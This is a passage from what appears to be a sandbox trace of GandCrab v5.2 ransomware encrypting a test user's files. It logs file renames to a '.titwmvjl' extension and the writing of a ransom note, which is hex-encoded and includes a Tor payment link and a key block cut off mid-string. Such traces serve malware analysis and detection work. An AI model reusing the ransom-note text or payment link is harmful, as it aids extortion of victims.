lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.195] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.198] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.199] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.199] CloseHandle (hObject=0x248) returned 1 [0090.200] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\6hr7putfgjynsw.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\6hr7PuTfGJYnsw.csv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\6hr7putfgjynsw.csv.titwmvjl"), dwFlags=0x1) returned 1 [0090.201] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.201] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.201] lstrcmpW (lpString1="7tuUT_3cI-UJwB", lpString2=".") returned 1 [0090.201] lstrcmpW (lpString1="7tuUT_3cI-UJwB", lpString2="..") returned 1 [0090.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="7tuUT_3cI-UJwB" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB" [0090.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\" [0090.201] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0090.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.201] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.201] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.202] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0090.202] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.202] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.202] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.202] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\\\TITWMVJL-DECRYPT.txt") returned 145 [0090.202] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\7tuUT_3cI-UJwB\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\7tuut_3ci-ujwb\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0090.203] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4